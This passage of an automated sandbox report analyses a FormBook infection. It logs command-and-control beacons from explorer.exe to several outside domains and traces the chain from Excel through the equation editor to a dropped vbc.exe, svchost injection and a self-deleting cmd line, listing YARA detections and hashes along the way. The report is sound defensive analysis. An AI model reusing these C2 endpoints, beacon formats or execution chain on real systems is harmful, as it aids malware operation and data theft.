                                                                                                                                                                    Nov 26, 2020 21:23:41.920305014 CET530OUTGET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=GKk2d32OHEJliZV7lc1R0hFu4AxFv3Wk4g8o+d/QQJC2fTrUsNVYmPem7KfYQyXD+5gDrQ== HTTP/1.1
                                                                                                                                                                    Host: www.kapkwata.com
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                    Data Ascii:
                                                                                                                                                                    Nov 26, 2020 21:23:42.188966036 CET530INHTTP/1.1 200 OK
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                                                                    X-Powered-By: Nginx
                                                                                                                                                                    Date: Thu, 26 Nov 2020 20:23:41 GMT
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                                                                                                    Data Ascii: 3


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                    4192.168.2.2249169101.100.209.14080C:\Windows\explorer.exe
                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                    Nov 26, 2020 21:23:47.764637947 CET531OUTGET /coz3/?MPxhwJ=aFYZso2mvNEUZnS9j6THNTuqPDrOfInARvQYZFtdg9PpX/64PIjCzIwYqotU8KZChZyPAA==&Nxl0wV=htxXA6k0ApBh HTTP/1.1
                                                                                                                                                                    Host: www.penrosecondos-official.com
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                    Data Ascii:
                                                                                                                                                                    Nov 26, 2020 21:23:49.936259031 CET532INHTTP/1.1 404 Not Found
                                                                                                                                                                    Date: Thu, 26 Nov 2020 20:23:47 GMT
                                                                                                                                                                    Server: Apache
                                                                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                    Link: <https://www.penrosecondos-official.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                    Upgrade: h2
                                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                    5192.168.2.224917074.220.199.680C:\Windows\explorer.exe
                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                    Nov 26, 2020 21:23:54.112483978 CET545OUTGET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=RDRn2Ild+/wzWORBRjhdFX6pRz32wHRA4wkCN1Xv+JiXsB19Ecc8PMGycfEZfvp5cD+cKQ== HTTP/1.1
                                                                                                                                                                    Host: www.teleeducationforafghanistan.com
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                    Data Ascii:
                                                                                                                                                                    Nov 26, 2020 21:23:54.282465935 CET547INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 26 Nov 2020 20:23:54 GMT
                                                                                                                                                                    Server: Apache/2.2.31 (CentOS)
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                    Data Raw: 31 32 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 20 74 65 6c 65 65 64 75 63 61 74 69 6f 6e 66 6f 72 61 66 67 68 61 6e 69 73 74 61 6e 2e 63 6f 6d 20 2d 20 42 6c 75 65 48 6f 73 74 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 62 6c 75 65 68 6f 73 74 2e 63 6f 6d 2f 6d 65 64 69 61 2f 73 68 61 72 65 64 2f 69 6e 66 6f 2f 69 6e 64 65 78 2f 5f 62 68 2f 68 6f 6d 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 62 6c 75 65 68 6f 73 74 2e 63 6f 6d 2f 6d 65 64 69 61 2f 73 68 61 72 65 64 2f 67 65 6e 65 72 61 6c 2f 5f 62 68 2f 6d 61 69 6e 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 42 6c 75 65 68 6f 73 74 20 2d 20 54 6f 70 20 72 61 74 65 64 20 77 65 62 20 68 6f 73 74 69 6e 67 20 70 72 6f 76 69 64 65 72 20 2d 20 46 72 65 65 20 31 20 63 6c 69 63 6b 20 69 6e 73 74 61 6c 6c 73 20 46 6f 72 20 62 6c 6f 67 73 2c 20 73 68 6f 70 70 69 6e 67 20 63 61 72 74 73 2c 20 61 6e 64 20 6d 6f 72 65 2e 20 47 65 74 20 61 20 66 72 65 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 2c 20 72 65 61 6c 20 4e 4f 4e 2d 6f 75 74 73 6f 75 72 63 65 64 20 32 34 2f 37 20 73 75 70 70 6f 72 74 2c 20 61 6e 64 20 73 75 70 65 72 69 6f 72 20 73 70 65 65 64 2e 20 77 65 62 20 68 6f 73 74 69 6e 67 20 70 72 6f 76 69 64 65 72 20 70 68 70 20 68 6f 73 74 69 6e 67 20 63 68 65 61 70 20 77 65 62 20 68 6f 73 74 69 6e 67 2c 20 57 65 62 20 68 6f 73 74 69 6e 67 2c 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 2c 20 66 72 6f 6e 74 20 70 61 67 65 20 68 6f 73 74 69 6e 67 2c 20 65 6d 61 69 6c 20 68 6f 73 74 69 6e 67 2e 20 20 57 65 20 6f 66 66 65 72 20 61 66 66 6f 72 64 61 62 6c 65 20 68 6f 73 74 69 6e 67 2c 20 77 65 62 20 68 6f 73 74 69 6e 67 20 70 72 6f 76 69 64 65 72 20 62 75 73 69 6e 65 73 73 20 77 65 62 20 68 6f 73 74 69 6e 67 2c 20 65 63 6f 6d 6d 65 72 63 65 20 68 6f 73 74 69 6e 67 2c 20 75 6e 69 78 20 68 6f 73 74 69 6e 67 2e 20 20 50 68 6f 6e 65 20 73 75 70 70 6f 72 74 20 61 76 61 69 6c 61 62 6c 65 2c 20 46 72 65 65 20 44 6f 6d 61 69 6e 2c 20 61 6e 64 20 46 72 65 65 20 53 65 74 75 70 2e 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 20 68 6f 73 74 69 6e 67 2c 20 70 72 6f 76 69 64 65 72 2c 20 70 68 70 20 68 6f 73 74 69 6e 67 2c 77 65 62 20 68 6f 73 74 69 6e 67 2c 20 66 72 65 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 2c 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 2c 20 66 72 6f 6e 74 20 70 61 67 65 20 68 6f 73 74 69 6e 67 2c 20 77 65 62 20 73 69
                                                                                                                                                                    Data Ascii: 12a8<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head><meta http-equiv="Content-type" content="text/html;charset=UTF-8" /><title>Welcome teleeducationforafghanistan.com - BlueHost.com</title><link rel="stylesheet" href="//www.bluehost.com/media/shared/info/index/_bh/home.css" type="text/css" /><link rel="stylesheet" href="//www.bluehost.com/media/shared/general/_bh/main.css" type="text/css" /><meta name="description" content="Bluehost - Top rated web hosting provider - Free 1 click installs For blogs, shopping carts, and more. Get a free domain name, real NON-outsourced 24/7 support, and superior speed. web hosting provider php hosting cheap web hosting, Web hosting, domain names, front page hosting, email hosting. We offer affordable hosting, web hosting provider business web hosting, ecommerce hosting, unix hosting. Phone support available, Free Domain, and Free Setup." /><meta name="keywords" content="web hosting, provider, php hosting,web hosting, free domain names, domain name, front page hosting, web si


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                    6192.168.2.2249171198.101.172.21780C:\Windows\explorer.exe
                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                    Nov 26, 2020 21:23:59.706502914 CET551OUTGET /coz3/?MPxhwJ=r7KW2tdRwlRuK7ncHXLiovSXqLjDerMq8ItDnZvkA+2BRQOB5Pe97gh02v96lMs3N6IAbw==&Nxl0wV=htxXA6k0ApBh HTTP/1.1
                                                                                                                                                                    Host: www.thevirginiahomesource.com
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                    Data Ascii:
                                                                                                                                                                    Nov 26, 2020 21:23:59.829381943 CET552INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                    Location: https://www.thevirginiahomesource.com/coz3/?MPxhwJ=r7KW2tdRwlRuK7ncHXLiovSXqLjDerMq8ItDnZvkA+2BRQOB5Pe97gh02v96lMs3N6IAbw==&Nxl0wV=htxXA6k0ApBh
                                                                                                                                                                    Server: BigIP
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                    Code Manipulations

                                                                                                                                                                    Statistics

                                                                                                                                                                    Behavior

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    System Behavior

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:21:39
                                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                    Imagebase:0x13f2c0000
                                                                                                                                                                    File size:27641504 bytes
                                                                                                                                                                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:21:59
                                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:543304 bytes
                                                                                                                                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:22:01
                                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                                    Path:C:\Users\Public\vbc.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                    Imagebase:0xb80000
                                                                                                                                                                    File size:498176 bytes
                                                                                                                                                                    MD5 hash:DA5CE3FE1991B9ACEF3B0BEEC210EE9F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2139267535.00000000025FE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:22:04
                                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                                    Path:C:\Users\Public\vbc.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:{path}
                                                                                                                                                                    Imagebase:0xb80000
                                                                                                                                                                    File size:498176 bytes
                                                                                                                                                                    MD5 hash:DA5CE3FE1991B9ACEF3B0BEEC210EE9F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:22:05
                                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:
                                                                                                                                                                    Imagebase:0xffca0000
                                                                                                                                                                    File size:3229696 bytes
                                                                                                                                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:22:24
                                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                    Imagebase:0x720000
                                                                                                                                                                    File size:20992 bytes
                                                                                                                                                                    MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                    General

                                                                                                                                                                    Start time:21:22:28
                                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                                    Imagebase:0x4a4e0000
                                                                                                                                                                    File size:302592 bytes
                                                                                                                                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    Disassembly

                                                                                                                                                                    Code Analysis

                                                                                                                                                                    Reset < >